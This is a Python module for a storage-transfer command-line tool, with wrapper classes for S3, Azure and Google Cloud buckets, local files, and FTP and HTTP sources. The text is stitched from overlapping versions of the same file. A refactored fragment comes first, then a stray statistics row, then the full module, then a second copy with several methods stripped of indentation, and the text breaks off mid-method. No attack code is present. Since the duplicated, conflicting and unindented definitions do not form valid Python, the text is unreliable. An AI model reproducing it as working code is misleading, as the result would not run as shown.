    def get_items(self):
        """List (FILE, absolute path, relative path, size) tuples under the path.

        Symlink handling follows self.symlinks: 'skip' drops links, 'filter'
        visits each link target at most once per branch (cycle protection),
        any other value traverses links as ordinary entries.
        """
        def leaf_path(source_path):
            # Base name of the path, falling back to the parent's name for
            # paths that end with a separator.
            head, tail = os.path.split(source_path)
            return tail or os.path.basename(head)

        self.path = os.path.abspath(self.path)
        if os.path.isfile(self.path):
            if os.path.islink(self.path) and self.symlinks == AllowedSymlinkValues.SKIP:
                return []
            return [(FILE, self.path, leaf_path(self.path), os.path.getsize(self.path))]
        result = list()
        visited_symlinks = set()

        def list_items(path, parent, symlinks, visited_symlinks, root=False):
            # Depth-first walk; appends to the enclosing `result` list.
            for item in os.listdir(path):
                absolute_path = os.path.join(path, item)
                symlink_target = None
                if os.path.islink(absolute_path) and symlinks != AllowedSymlinkValues.FOLLOW:
                    if symlinks == AllowedSymlinkValues.SKIP:
                        continue
                    if symlinks == AllowedSymlinkValues.FILTER:
                        symlink_target = os.readlink(absolute_path)
                        if symlink_target in visited_symlinks:
                            continue
                        else:
                            visited_symlinks.add(symlink_target)
                relative_path = item
                if not root and parent is not None:
                    relative_path = os.path.join(parent, item)
                if os.path.isfile(absolute_path):
                    result.append((FILE, absolute_path, relative_path, os.path.getsize(absolute_path)))
                elif os.path.isdir(absolute_path):
                    list_items(absolute_path, relative_path, symlinks, visited_symlinks)
                if symlink_target and os.path.islink(path) and symlink_target in visited_symlinks:
                    visited_symlinks.remove(symlink_target)

        list_items(self.path, leaf_path(self.path), self.symlinks, visited_symlinks, root=True)
        return result

    def create_folder(self, relative_path):
        """Create relative_path under the wrapped path; return an error string or None."""
        absolute_path = os.path.join(self.path, relative_path)
        if os.path.isfile(absolute_path):
            return 'Error creating folder {}: a file with the same name already exists'.format(relative_path)
        if not os.path.isdir(absolute_path):
            os.makedirs(absolute_path)
        return None

    def _stream_download(self, full_path, source_uri, relative_path, announce=False):
        """Stream *source_uri* into *full_path*.

        Shows a progress bar when the response advertises a content length,
        otherwise a plain '<name>... done.' line.  Shared by download_file()
        and download_single_file(), whose bodies were previously duplicated.
        """
        r = requests.get(source_uri, stream=True)
        content_length = None
        if 'content-length' in r.headers:
            content_length = int(r.headers['content-length'])
        if content_length is None:
            click.echo('{}...'.format(relative_path), nl=False)
            with open(full_path, 'wb') as f:
                for chunk in r.iter_content(chunk_size=1024):
                    if chunk:  # filter out keep-alive new chunks
                        f.write(chunk)
            click.echo('done.')
        else:
            estimated_bytes = content_length
            if announce:
                click.echo('{}:'.format(relative_path))
            with click.progressbar(length=content_length,
                                   show_eta=False,
                                   label=relative_path,
                                   bar_template='[%(bar)s] %(info)s %(label)s') as progress_bar:
                with open(full_path, 'wb') as f:
                    for chunk in r.iter_content(chunk_size=1024):
                        if chunk:  # filter out keep-alive new chunks
                            f.write(chunk)
                            if len(chunk) > 0:
                                estimated_bytes -= len(chunk)
                                progress_bar.update(len(chunk))
                # Push the bar to 100% if fewer bytes than advertised arrived.
                progress_bar.update(estimated_bytes)

    def download_single_file(self, source_uri, relative_path):
        """Download one file; the wrapped path names the target file itself."""
        if source_uri is None:
            click.echo('Download uri is empty for file {}'.format(relative_path), err=True)
            sys.exit(1)
        folder, file_name = os.path.split(self.path)
        file_name = file_name or relative_path
        full_path = os.path.join(folder, file_name)
        if not os.path.isdir(folder):
            os.makedirs(folder)
        if os.path.isdir(full_path):
            click.echo('Error copying file to \'{}\': a directory with the same name already exists'.format(full_path),
                       err=True)
            sys.exit(1)
        self._stream_download(full_path, source_uri, relative_path, announce=True)

    def download_file(self, source_uri, relative_path):
        """Download a file into the wrapped directory under relative_path."""
        if source_uri is None:
            click.echo('Download uri is empty for file {}'.format(relative_path), err=True)
            sys.exit(1)
        self._stream_download(os.path.join(self.path, relative_path), source_uri, relative_path)

    def delete_item(self, relative_path):
        """Remove a file, or recursively remove a directory tree, under the path."""
        path = os.path.join(self.path, relative_path)
        if os.path.isfile(path) and os.path.exists(path):
            os.remove(path)
        else:
            shutil.rmtree(path, ignore_errors=True)
class FtpSourceWrapper(DataStorageWrapper):
    """Read-only wrapper for an ftp(s):// source.

    Connects on construction (anonymous login) and lists paths via NLST.
    """

    def __init__(self, scheme, netloc, relative_path, url):
        super(FtpSourceWrapper, self).__init__(url)
        self.is_file_flag = False
        self.exists_flag = False
        self.relative_path = relative_path
        self.host = netloc
        self.scheme = scheme
        self.ftp = FTP(netloc)
        self.ftp.login()  # no credentials: anonymous login

    def get_type(self):
        return WrapperType.FTP

    def exists(self):
        """Probe the path with NLST; a temporary FTP error means 'absent'."""
        try:
            self.ftp.nlst(self.relative_path)
            self.exists_flag = True
            return True
        except error_temp:
            self.exists_flag = False
            return False

    def is_file(self):
        # NOTE(review): NLST returning a single entry is taken to mean 'file';
        # a directory containing exactly one entry would be misclassified —
        # confirm against the target FTP servers.
        self.is_file_flag = len(self.ftp.nlst(self.relative_path)) == 1
        return self.is_file_flag

    def get_items(self):
        return self._get_files([], self.relative_path)

    def _get_files(self, files, path):
        """Recursively collect (FILE, url, relative name, size) tuples into *files*."""
        remote_files = self.ftp.nlst(path)
        if len(remote_files) == 1:
            self.ftp.voidcmd('TYPE I')  # change ftp connection to binary mode to get file size
            files.append((FILE, "%s://%s%s" % (self.scheme, self.host, path),
                          self._get_relative_path(path).strip("/"), self.ftp.size(path)))
        else:
            for file_path in remote_files:
                self._get_files(files, file_path)
        return files

    def _get_relative_path(self, path):
        # The root item maps to its base name; children map to the suffix
        # after the root prefix.
        if self.relative_path == path:
            return os.path.basename(path)
        else:
            return path[len(self.relative_path):]
class HttpSourceWrapper(DataStorageWrapper):
    """Read-only wrapper for an http(s):// source.

    Also serves ftp:// URLs through an HTTP adapter when the ftp_proxy
    environment variable is set.  Non-HTML resources are treated as single
    downloadable files; HTML pages are crawled for same-host links.
    """

    def __init__(self, url):
        super(HttpSourceWrapper, self).__init__(url)
        self.host = urlparse(url).netloc
        self.is_file_flag = False
        self.exists_flag = False
        self.ftp_proxy_session = None
        if os.getenv("ftp_proxy"):
            self.ftp_proxy_session = requests.Session()
            self.ftp_proxy_session.mount('ftp://', requests.adapters.HTTPAdapter())

    def get_type(self):
        return WrapperType.HTTP

    def exists(self):
        # Reachable means HEAD answered 200.
        head = self._head(self.path)
        self.exists_flag = head.status_code == 200
        return self.exists_flag

    def is_file(self):
        self.is_file_flag = self._is_downloadable()
        return self.is_file_flag

    def get_items(self):
        return self._get_files(self.path, [], [])

    def _head(self, path):
        return self.ftp_proxy_session.head(path) if self.ftp_proxy_session \
            else requests.head(path, allow_redirects=True)

    def _get(self, path):
        return self.ftp_proxy_session.get(path) if self.ftp_proxy_session else requests.get(path)

    def _is_downloadable(self, path=None):
        """Return True when *path* (default: the wrapped URL) is a downloadable
        resource, i.e. its content type is absent or not HTML."""
        head = self._head(path if path is not None else self.path)
        content_type = head.headers.get('content-type')
        return content_type is None or 'html' not in content_type.lower()

    def _get_files(self, path, files, processed_paths):
        """Crawl *path* recursively, appending (FILE, url, relative name, size)
        tuples for every downloadable resource found.

        Bug fix: the downloadable check now inspects the *current* path.  It
        previously always HEADed the root URL (self.path), so links discovered
        under an HTML index page were re-crawled as HTML instead of being
        recorded as downloadable files.
        """
        if path in processed_paths:
            return files
        processed_paths.append(path)
        if self._is_downloadable(path):
            head = self._head(path)
            content_length = head.headers.get('Content-Length')
            files.append((FILE, str(path), self._get_relative_path(path).strip("/"),
                          content_length if content_length is None else int(content_length)))
        else:
            response = self._get(path)
            soup = BeautifulSoup(response.content, "html.parser", parse_only=SoupStrainer('a'))
            page_paths = set([link['href'] for link in soup.findAll('a', href=True)])
            for page_path in page_paths:
                current_host = urlparse(page_path).netloc
                if current_host:
                    # Absolute link: follow only same-host, reachable targets.
                    if page_path in processed_paths:
                        continue
                    if current_host != self.host:
                        processed_paths.append(page_path)
                        continue
                    head = self._head(page_path)
                    if head.status_code == 200:
                        self._get_files(page_path, files, processed_paths)
                else:
                    # Relative link: resolve against the current page and stay
                    # inside the wrapped root path.
                    parsed = urlparse(path)
                    normalized_path = "%s://%s%s" % (parsed.scheme, parsed.netloc,
                                                     posixpath.normpath(os.path.join(parsed.path, page_path)))
                    if normalized_path in processed_paths:
                        continue
                    if not normalized_path.startswith(self.path):
                        processed_paths.append(normalized_path)
                        continue
                    head = self._head(normalized_path)
                    if head.status_code == 200:
                        self._get_files(normalized_path, files, processed_paths)
                    else:
                        processed_paths.append(normalized_path)
        return files

    def _get_relative_path(self, path):
        # The root URL maps to its base name; children map to the suffix
        # after the root prefix.
        if self.path == path:
            return os.path.basename(path)
        else:
            return path[len(self.path):]
| 39.787743 | 119 | 0.63164 |
import os
from abc import abstractmethod, ABCMeta
from ftplib import FTP, error_temp
from future.standard_library import install_aliases
install_aliases()
from urllib.parse import urlparse
import click
import requests
import sys
from ..api.data_storage import DataStorage
from ..config import ConfigNotFoundError
from ..utilities.storage.s3 import S3BucketOperations
from ..utilities.storage.local import LocalOperations
from ..utilities.storage.azure import AzureListingManager, AzureDeleteManager, AzureBucketOperations
from ..utilities.storage.gs import GsRestoreManager, GsListingManager, GsDeleteManager, GsBucketOperations
from ..utilities.storage.common import StorageOperations
from .data_storage_wrapper_type import WrapperType
import shutil
from bs4 import BeautifulSoup, SoupStrainer
import posixpath
# Item-type tags used in the (type, full path, relative path, size) tuples
# produced by the wrappers' get_items() implementations.
FILE = 'File'
FOLDER = 'Folder'
class AllowedSymlinkValues(object):
    """Recognized symlink-handling modes for local file-system traversal."""
    FOLLOW = 'follow'  # traverse symlinks as ordinary entries
    SKIP = 'skip'      # ignore symlinked entries
    FILTER = 'filter'  # visit each symlink target at most once (cycle protection)
class DataStorageWrapper(object):
    """Base class for transfer source/destination path wrappers.

    A wrapper adapts one location kind (cloud bucket, local file system,
    FTP or HTTP source) to the common interface used by the transfer
    commands: existence/type checks, item listing, download and delete.
    """

    # Maps a (source type, destination type) pair to the factory that builds
    # the transfer manager able to move data between those two location kinds.
    _transfer_manager_suppliers = {
        (WrapperType.S3, WrapperType.S3): S3BucketOperations.get_transfer_between_buckets_manager,
        (WrapperType.S3, WrapperType.LOCAL): S3BucketOperations.get_download_manager,
        (WrapperType.LOCAL, WrapperType.S3): S3BucketOperations.get_upload_manager,
        (WrapperType.FTP, WrapperType.S3): S3BucketOperations.get_transfer_from_http_or_ftp_manager,
        (WrapperType.HTTP, WrapperType.S3): S3BucketOperations.get_transfer_from_http_or_ftp_manager,
        (WrapperType.AZURE, WrapperType.AZURE): AzureBucketOperations.get_transfer_between_buckets_manager,
        (WrapperType.AZURE, WrapperType.LOCAL): AzureBucketOperations.get_download_manager,
        (WrapperType.LOCAL, WrapperType.AZURE): AzureBucketOperations.get_upload_manager,
        (WrapperType.FTP, WrapperType.AZURE): AzureBucketOperations.get_transfer_from_http_or_ftp_manager,
        (WrapperType.HTTP, WrapperType.AZURE): AzureBucketOperations.get_transfer_from_http_or_ftp_manager,
        (WrapperType.GS, WrapperType.GS): GsBucketOperations.get_transfer_between_buckets_manager,
        (WrapperType.GS, WrapperType.LOCAL): GsBucketOperations.get_download_manager,
        (WrapperType.LOCAL, WrapperType.GS): GsBucketOperations.get_upload_manager,
        (WrapperType.FTP, WrapperType.GS): GsBucketOperations.get_transfer_from_http_or_ftp_manager,
        (WrapperType.HTTP, WrapperType.GS): GsBucketOperations.get_transfer_from_http_or_ftp_manager,
        (WrapperType.FTP, WrapperType.LOCAL): LocalOperations.get_transfer_from_http_or_ftp_manager,
        (WrapperType.HTTP, WrapperType.LOCAL): LocalOperations.get_transfer_from_http_or_ftp_manager
    }

    def __init__(self, path):
        self.path = path
        self.items = []  # cached listing, filled by fetch_items()
        self.path_separator = StorageOperations.PATH_SEPARATOR

    @classmethod
    def get_wrapper(cls, uri, symlinks=None):
        """Return the wrapper matching *uri*'s scheme.

        Schemeless URIs map to the local file system.  ftp(s) URIs are served
        over HTTP when the ftp_proxy environment variable is set, otherwise
        via a direct FTP connection.  http(s) URIs get an HTTP wrapper; any
        other scheme is assumed to be a cloud storage URI.
        """
        parsed = urlparse(uri)
        if not parsed.scheme or not parsed.netloc:
            return LocalFileSystemWrapper(uri, symlinks)
        if parsed.scheme.lower() == 'ftp' or parsed.scheme.lower() == 'ftps':
            return HttpSourceWrapper(uri) if os.getenv("ftp_proxy") \
                else FtpSourceWrapper(parsed.scheme, parsed.netloc, parsed.path, uri)
        if parsed.scheme.lower() == 'http' or parsed.scheme.lower() == 'https':
            return HttpSourceWrapper(uri)
        else:
            return cls.get_cloud_wrapper(uri)

    @classmethod
    def get_cloud_wrapper(cls, uri, versioning=False):
        """Resolve *uri* via the API and build the matching bucket wrapper."""
        root_bucket, original_path, _ = DataStorage.load_from_uri(uri)
        relative_path = original_path if original_path != '/' else ''
        return cls.__get_storage_wrapper(root_bucket, relative_path, versioning=versioning)

    @classmethod
    def get_cloud_wrapper_for_bucket(cls, bucket_model, relative_path):
        """Build a bucket wrapper from an already-resolved model (no init call)."""
        return cls.__get_storage_wrapper(bucket_model, relative_path, init=False)

    @classmethod
    def __get_storage_wrapper(cls, bucket, relative_path, *args, **kwargs):
        """Dispatch to the provider-specific wrapper factory by bucket type."""
        _suppliers = {
            WrapperType.S3: S3BucketWrapper.build_wrapper,
            WrapperType.AZURE: AzureBucketWrapper.build_wrapper,
            WrapperType.GS: GsBucketWrapper.build_wrapper,
        }
        if bucket.type in _suppliers:
            supplier = _suppliers[bucket.type]
            return supplier(bucket, relative_path, *args, **kwargs)
        else:
            raise RuntimeError('There is no data storage wrapper for %s storage type.' % bucket.type)

    @classmethod
    def get_operation_manager(cls, source_wrapper, destination_wrapper, command):
        """Return the transfer manager for the (source, destination) type pair."""
        manager_types = source_wrapper.get_type(), destination_wrapper.get_type()
        if manager_types in DataStorageWrapper._transfer_manager_suppliers:
            supplier = DataStorageWrapper._transfer_manager_suppliers[manager_types]
            return supplier(source_wrapper, destination_wrapper, command)
        else:
            raise RuntimeError('Transferring files between the following storage types %s -> %s is not supported.'
                               % manager_types)

    @classmethod
    def get_data_storage_item_path_info(cls, path, buckets=None):
        """Resolve *path* to (error, bucket id, relative path, item type, delimiter).

        NOTE(review): the error returns below carry 4 elements while the
        success return carries 5 — confirm that callers unpack accordingly.
        """
        error = None
        if buckets is None or len(buckets) == 0:
            buckets = []
            try:
                buckets = list(DataStorage.list())
            except ConfigNotFoundError as config_not_found_error:
                error = str(config_not_found_error)
            except requests.exceptions.RequestException as http_error:
                error = 'Http error: {}'.format(str(http_error))
            except RuntimeError as runtime_error:
                error = 'Error: {}'.format(str(runtime_error))
            except ValueError as value_error:
                error = 'Error: {}'.format(str(value_error))
        if error:
            return error, None, None, None
        url = urlparse(path)
        if url.scheme.lower() not in WrapperType.cloud_schemes():
            return "'%s' scheme is not supported" % url.scheme, None, None, None
        parts = url.path.split('/')
        current_bucket = None
        for bucket_model in buckets:
            # NOTE(review): the original-case *path* is tested against the
            # lowercased bucket path, and the loop breaks on the first match,
            # which makes the longest-prefix comparison below ineffective —
            # confirm intent before changing.
            if bucket_model.path is not None \
                    and bucket_model.type in WrapperType.cloud_types() \
                    and path.startswith(bucket_model.path.lower()):
                if current_bucket is None or len(bucket_model.path) > len(current_bucket.path):
                    current_bucket = bucket_model
                break
        if current_bucket is None:
            return 'Storage \'{}\' was not found'.format(path), None, None, None
        delimiter = '/'
        if current_bucket.delimiter is not None:
            delimiter = current_bucket.delimiter
        relative_path = url.path
        item_type = FILE
        # Heuristic: a last path segment without a '.' is treated as a folder.
        if len(parts[len(parts) - 1].split('.')) == 1:
            item_type = FOLDER
        return None, current_bucket.identifier, relative_path, item_type, delimiter

    def get_type(self):
        # Subclasses return their WrapperType constant; the base has none.
        return None

    def is_file(self):
        return False

    def exists(self):
        return False

    def is_empty(self, relative=None):
        return False

    def is_local(self):
        return self.get_type() == WrapperType.LOCAL

    def fetch_items(self):
        # Cache the listing for later get_folders_list/get_files_list calls.
        self.items = self.get_items()

    def get_items(self):
        # Subclasses return (type, full path, relative path, size) tuples.
        return []

    def get_folders_list(self):
        """(full path, relative path) pairs for cached FOLDER items."""
        return map(lambda i: (i[1], i[2]), [item for item in self.items if item[0] == FOLDER])

    def get_files_list(self):
        """(full path, relative path) pairs for cached FILE items."""
        return map(lambda i: (i[1], i[2]), [item for item in self.items if item[0] == FILE])

    def create_folder(self, relative_path):
        pass

    def download_file(self, source_uri, relative_path):
        pass

    def download_single_file(self, source_uri, relative_path):
        pass

    def get_file_download_uri(self, relative_path):
        return None

    def delete_item(self, relative_path):
        pass

    def path_with_trailing_separator(self):
        """Return the wrapped path guaranteed to end with this wrapper's separator."""
        return self.path \
            if self.path.endswith(self.path_separator) \
            else self.path + self.path_separator
class CloudDataStorageWrapper(DataStorageWrapper):
    """Common base for cloud bucket wrappers (S3, Azure, GS).

    Subclasses supply the provider-specific listing/restore/delete managers.
    """
    # Python 2 style metaclass declaration (ignored on Python 3).
    __metaclass__ = ABCMeta

    def __init__(self, bucket, path):
        super(CloudDataStorageWrapper, self).__init__(path)
        self.bucket = bucket  # bucket model for this storage
        self.is_file_flag = False
        self.exists_flag = False
        # An empty relative path denotes the bucket root itself.
        if len(path) == 0 and self.bucket.identifier:
            self.exists_flag = True
            self.is_file_flag = False

    def is_file(self):
        return self.is_file_flag

    def exists(self):
        return self.exists_flag

    def get_items(self):
        return self.get_list_manager().get_items(self.path)

    def is_empty(self, relative=None):
        """True when the path is absent, or names no existing folder in the bucket."""
        if not self.exists():
            return True
        if self.is_file():
            return False
        if relative:
            delimiter = StorageOperations.PATH_SEPARATOR
            path = self.path.rstrip(delimiter) + delimiter + relative
        else:
            path = self.path
        return not self.get_list_manager().folder_exists(path)

    @abstractmethod
    def get_type(self):
        # Provider-specific WrapperType constant.
        pass

    @abstractmethod
    def get_restore_manager(self):
        # Manager able to restore versioned items (where supported).
        pass

    @abstractmethod
    def get_list_manager(self, show_versions=False):
        # Manager able to list bucket contents.
        pass

    @abstractmethod
    def get_delete_manager(self, versioning):
        # Manager able to delete bucket contents.
        pass
class S3BucketWrapper(CloudDataStorageWrapper):
    """Wrapper for AWS S3 bucket paths; delegates to S3BucketOperations."""

    def __init__(self, bucket, path):
        super(S3BucketWrapper, self).__init__(bucket, path)
        # Keep only the root bucket name from the full bucket path.
        self.bucket.path = bucket.path.split(self.path_separator)[0]
        self.is_empty_flag = True
        # presumably assigned by S3BucketOperations.init_wrapper — verify.
        self.session = None

    @classmethod
    def build_wrapper(cls, root_bucket, relative_path, init=True, *args, **kwargs):
        """Construct the wrapper; when init=True, initialize it against S3."""
        wrapper = S3BucketWrapper(root_bucket, relative_path)
        if init:
            S3BucketOperations.init_wrapper(wrapper, *args, **kwargs)
        return wrapper

    def get_type(self):
        return WrapperType.S3

    def is_empty(self, relative=None):
        """Like the base check, but uses the state captured at init time."""
        if not self.exists():
            return True
        if self.is_file():
            return False
        if not self.is_empty_flag and relative:
            return not S3BucketOperations.path_exists(self, relative, session=self.session)
        return self.is_empty_flag

    def get_file_download_uri(self, relative_path):
        """Return a generated download URL for the item, or None."""
        download_url_model = DataStorage.generate_download_url(self.bucket.identifier, relative_path)
        if download_url_model is not None:
            return download_url_model.url
        return None

    def delete_item(self, relative_path):
        S3BucketOperations.delete_item(self, relative_path, session=self.session)

    def get_restore_manager(self):
        return S3BucketOperations.get_restore_manager(self)

    def get_list_manager(self, show_versions=False):
        return S3BucketOperations.get_list_manager(self, show_versions=show_versions)

    def get_delete_manager(self, versioning):
        return S3BucketOperations.get_delete_manager(self, versioning)
class AzureBucketWrapper(CloudDataStorageWrapper):
    """Wrapper for Azure blob storage paths (versioning is not supported)."""

    def __init__(self, bucket, path):
        super(AzureBucketWrapper, self).__init__(bucket, path)
        self.service = None  # lazily-built blob service client, see _blob_service()

    @classmethod
    def build_wrapper(cls, root_bucket, relative_path, versioning=False, init=True):
        """Construct the wrapper; Azure rejects any versioning request."""
        if versioning:
            raise RuntimeError('Versioning is not supported by AZURE cloud provider')
        wrapper = AzureBucketWrapper(root_bucket, relative_path)
        if init:
            StorageOperations.init_wrapper(wrapper, versioning=versioning)
        return wrapper

    def get_type(self):
        return WrapperType.AZURE

    def get_restore_manager(self):
        raise RuntimeError('Versioning is not supported by AZURE cloud provider')

    def get_list_manager(self, show_versions=False):
        if show_versions:
            raise RuntimeError('Versioning is not supported by AZURE cloud provider')
        return AzureListingManager(self._blob_service(read=True, write=False), self.bucket)

    def get_delete_manager(self, versioning):
        if versioning:
            raise RuntimeError('Versioning is not supported by AZURE cloud provider')
        return AzureDeleteManager(self._blob_service(read=True, write=True), self.bucket)

    def _blob_service(self, read, write):
        # A write-capable service is always rebuilt; a read-only one is cached.
        if write or not self.service:
            self.service = AzureBucketOperations.get_blob_service(self.bucket, read, write)
        return self.service
class GsBucketWrapper(CloudDataStorageWrapper):
    """Wrapper for Google Cloud Storage bucket paths."""

    @classmethod
    def build_wrapper(cls, root_bucket, relative_path, init=True, *args, **kwargs):
        """Construct the wrapper and, unless init is False, initialize it."""
        wrapper = GsBucketWrapper(root_bucket, relative_path)
        if init:
            StorageOperations.init_wrapper(wrapper, *args, **kwargs)
        return wrapper

    def get_type(self):
        return WrapperType.GS

    def get_restore_manager(self):
        return GsRestoreManager(self._storage_client(write=True, versioning=True), self)

    def get_list_manager(self, show_versions=False):
        return GsListingManager(self._storage_client(versioning=show_versions), self.bucket, show_versions)

    def get_delete_manager(self, versioning):
        return GsDeleteManager(self._storage_client(write=True, versioning=versioning), self.bucket)

    def _storage_client(self, read=True, write=False, versioning=False):
        # Delegates client construction to the shared GS operations helper.
        return GsBucketOperations.get_client(self.bucket, read=read, write=write, versioning=versioning)
class LocalFileSystemWrapper(DataStorageWrapper):
def __init__(self, path, symlinks=None):
super(LocalFileSystemWrapper, self).__init__(path)
if self.path == ".":
self.path = "./"
if self.path.startswith("~"):
self.path = os.path.join(os.path.expanduser('~'), self.path.strip("~/"))
self.symlinks = symlinks
self.path_separator = os.sep
def exists(self):
return os.path.exists(self.path)
def is_file(self):
return os.path.isfile(self.path)
def get_type(self):
return WrapperType.LOCAL
def is_empty(self, relative=None):
if not self.exists():
return True
if self.is_file():
return False
if relative:
return not os.path.exists(os.path.join(self.path, relative))
return not os.listdir(self.path)
def get_items(self):
def leaf_path(source_path):
head, tail = os.path.split(source_path)
return tail or os.path.basename(head)
self.path = os.path.abspath(self.path)
if os.path.isfile(self.path):
if os.path.islink(self.path) and self.symlinks == AllowedSymlinkValues.SKIP:
return []
return [(FILE, self.path, leaf_path(self.path), os.path.getsize(self.path))]
else:
result = list()
visited_symlinks = set()
def list_items(path, parent, symlinks, visited_symlinks, root=False):
for item in os.listdir(path):
absolute_path = os.path.join(path, item)
symlink_target = None
if os.path.islink(absolute_path) and symlinks != AllowedSymlinkValues.FOLLOW:
if symlinks == AllowedSymlinkValues.SKIP:
continue
if symlinks == AllowedSymlinkValues.FILTER:
symlink_target = os.readlink(absolute_path)
if symlink_target in visited_symlinks:
continue
else:
visited_symlinks.add(symlink_target)
relative_path = item
if not root and parent is not None:
relative_path = os.path.join(parent, item)
if os.path.isfile(absolute_path):
result.append((FILE, absolute_path, relative_path, os.path.getsize(absolute_path)))
elif os.path.isdir(absolute_path):
list_items(absolute_path, relative_path, symlinks, visited_symlinks)
if symlink_target and os.path.islink(path) and symlink_target in visited_symlinks:
visited_symlinks.remove(symlink_target)
list_items(self.path, leaf_path(self.path), self.symlinks, visited_symlinks, root=True)
return result
def create_folder(self, relative_path):
absolute_path = os.path.join(self.path, relative_path)
if os.path.isfile(absolute_path):
return 'Error creating folder {}: a file with the same name already exists'.format(relative_path)
if not os.path.isdir(absolute_path):
os.makedirs(absolute_path)
return None
def download_single_file(self, source_uri, relative_path):
    """Stream ``source_uri`` into a single local file.

    The destination is derived from ``self.path``: its directory part is
    created if missing, and its file part defaults to ``relative_path``
    when ``self.path`` ends with a separator.  Shows a progress bar when
    the server reports ``content-length``; exits the CLI process on a
    missing uri or when a directory blocks the destination path.
    """
    if source_uri is None:
        click.echo('Download uri is empty for file {}'.format(relative_path), err=True)
        sys.exit(1)
    folder, file_name = os.path.split(self.path)
    file_name = file_name or relative_path
    full_path = os.path.join(folder, file_name)
    if not os.path.isdir(folder):
        os.makedirs(folder)
    if os.path.isdir(full_path):
        click.echo('Error copying file to \'{}\': a directory with the same name already exists'.format(full_path),
                   err=True)
        sys.exit(1)
    r = requests.get(source_uri, stream=True)
    content_length = None
    if 'content-length' in r.headers:
        content_length = int(r.headers['content-length'])
    if content_length is None:
        # Unknown size: no progress bar, just a "name... done." line.
        click.echo('{}...'.format(relative_path), nl=False)
        with open(full_path, 'wb') as f:
            for chunk in r.iter_content(chunk_size=1024):
                if chunk:  # skip keep-alive chunks
                    f.write(chunk)
        click.echo('done.')
    else:
        estimated_bytes = content_length
        click.echo('{}:'.format(relative_path))
        with click.progressbar(length=content_length,
                               show_eta=False,
                               label=relative_path,
                               bar_template='[%(bar)s] %(info)s %(label)s') as progress_bar:
            with open(full_path, 'wb') as f:
                for chunk in r.iter_content(chunk_size=1024):
                    if chunk:
                        f.write(chunk)
                        if len(chunk) > 0:
                            estimated_bytes -= len(chunk)
                            progress_bar.update(len(chunk))
            # Flush whatever the reported length over-estimated so the
            # bar always finishes at 100%.
            progress_bar.update(estimated_bytes)
    # Fixed: removed a dead trailing `pass` statement that followed the
    # progress-bar branch in the original.
def download_file(self, source_uri, relative_path):
    """Stream ``source_uri`` into ``<root>/<relative_path>``.

    Shows a progress bar when the server reports ``content-length``;
    otherwise prints a simple "name... done." line.  Exits the CLI
    process when the uri is missing.
    """
    if source_uri is None:
        click.echo('Download uri is empty for file {}'.format(relative_path), err=True)
        sys.exit(1)
    r = requests.get(source_uri, stream=True)
    content_length = None
    if 'content-length' in r.headers:
        content_length = int(r.headers['content-length'])
    if content_length is None:
        # Unknown size: no progress bar.
        click.echo('{}...'.format(relative_path), nl=False)
        with open(os.path.join(self.path, relative_path), 'wb') as f:
            for chunk in r.iter_content(chunk_size=1024):
                if chunk:  # skip keep-alive chunks
                    f.write(chunk)
        click.echo('done.')
    else:
        estimated_bytes = content_length
        with click.progressbar(length=content_length,
                               show_eta=False,
                               label=relative_path,
                               bar_template='[%(bar)s] %(info)s %(label)s') as progress_bar:
            with open(os.path.join(self.path, relative_path), 'wb') as f:
                for chunk in r.iter_content(chunk_size=1024):
                    if chunk:
                        f.write(chunk)
                        if len(chunk) > 0:
                            estimated_bytes -= len(chunk)
                            progress_bar.update(len(chunk))
            # Flush whatever the reported length over-estimated so the
            # bar always finishes at 100%.
            progress_bar.update(estimated_bytes)
def delete_item(self, relative_path):
    """Delete a file or directory tree at ``relative_path`` under the root.

    Regular files are removed directly; anything else (directories,
    missing paths, dangling links) goes through ``shutil.rmtree`` with
    errors suppressed, so deleting a non-existent item stays a silent
    no-op — matching the previous best-effort behaviour.
    """
    path = os.path.join(self.path, relative_path)
    if os.path.isfile(path):
        # os.path.isfile() already implies existence, so the former extra
        # os.path.exists() check was redundant and has been dropped.
        os.remove(path)
    else:
        shutil.rmtree(path, ignore_errors=True)
class FtpSourceWrapper(DataStorageWrapper):
    """Read-only wrapper over an FTP location.

    Used as a transfer *source*: it can test existence, distinguish file
    vs. directory, and enumerate files — it does not write.  The FTP
    session is opened with anonymous login and kept for the wrapper's
    lifetime.
    """
    def __init__(self, scheme, netloc, relative_path, url):
        super(FtpSourceWrapper, self).__init__(url)
        self.is_file_flag = False
        self.exists_flag = False
        self.relative_path = relative_path
        self.host = netloc
        self.scheme = scheme
        # Anonymous FTP session (login() with no arguments).
        self.ftp = FTP(netloc)
        self.ftp.login()

    def get_type(self):
        return WrapperType.FTP

    def exists(self):
        # NLST on a missing path raises a transient (4xx) FTP error.
        try:
            self.ftp.nlst(self.relative_path)
            self.exists_flag = True
            return True
        except error_temp:
            self.exists_flag = False
            return False

    def is_file(self):
        # Heuristic: NLST of a regular file returns exactly one entry.
        # NOTE(review): a directory containing a single entry would also
        # match this test and be misclassified — confirm against callers.
        self.is_file_flag = len(self.ftp.nlst(self.relative_path)) == 1
        return self.is_file_flag

    def get_items(self):
        return self._get_files([], self.relative_path)

    def _get_files(self, files, path):
        """Recursively accumulate (FILE, uri, relative_path, size) tuples."""
        remote_files = self.ftp.nlst(path)
        if len(remote_files) == 1:
            # Treated as a single file: switch to binary mode ("TYPE I")
            # so the SIZE command is permitted by the server.
            self.ftp.voidcmd('TYPE I')
            files.append((FILE, "%s://%s%s" % (self.scheme, self.host, path),
                          self._get_relative_path(path).strip("/"), self.ftp.size(path)))
        else:
            for file_path in remote_files:
                self._get_files(files, file_path)
        return files

    def _get_relative_path(self, path):
        # For the root itself fall back to its basename; otherwise strip
        # the root prefix to obtain the path relative to it.
        if self.relative_path == path:
            return os.path.basename(path)
        else:
            return path[len(self.relative_path):]
class HttpSourceWrapper(DataStorageWrapper):
    """Read-only wrapper over an HTTP(S) location.

    Treats a URL either as a single downloadable file or as an HTML
    index page to crawl recursively for same-host file links.  When an
    ``ftp_proxy`` environment variable is set, requests are routed
    through a dedicated session mounting an HTTP adapter for ftp:// URLs.
    """
    def __init__(self, url):
        super(HttpSourceWrapper, self).__init__(url)
        self.host = urlparse(url).netloc
        self.is_file_flag = False
        self.exists_flag = False
        self.ftp_proxy_session = None
        if os.getenv("ftp_proxy"):
            self.ftp_proxy_session = requests.Session()
            self.ftp_proxy_session.mount('ftp://', requests.adapters.HTTPAdapter())

    def get_type(self):
        return WrapperType.HTTP

    def exists(self):
        head = self._head(self.path)
        self.exists_flag = head.status_code == 200
        return self.exists_flag

    def is_file(self):
        self.is_file_flag = self._is_downloadable()
        return self.is_file_flag

    def get_items(self):
